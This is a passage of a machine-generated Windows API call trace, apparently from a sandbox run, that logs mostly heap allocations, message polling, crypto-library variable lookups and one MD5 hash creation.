(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0262.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0262.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.783] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0262.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0262.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0262.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0262.784] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0262.784] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0262.784] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.784] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0262.785] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0262.785] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0262.785] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0262.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0262.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0262.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0262.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0262.786] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0262.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0262.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0262.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0262.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0262.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0262.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0262.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.788] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0262.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0262.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0262.789] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.789] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.789] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0262.789] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0262.790] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0262.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0262.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0262.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0262.790] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0262.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.791] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0262.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0262.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0262.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0262.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51dc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0262.792] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0262.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0262.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0262.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0262.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0262.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0262.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0262.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0262.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0262.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0262.794] HeapFree (in: 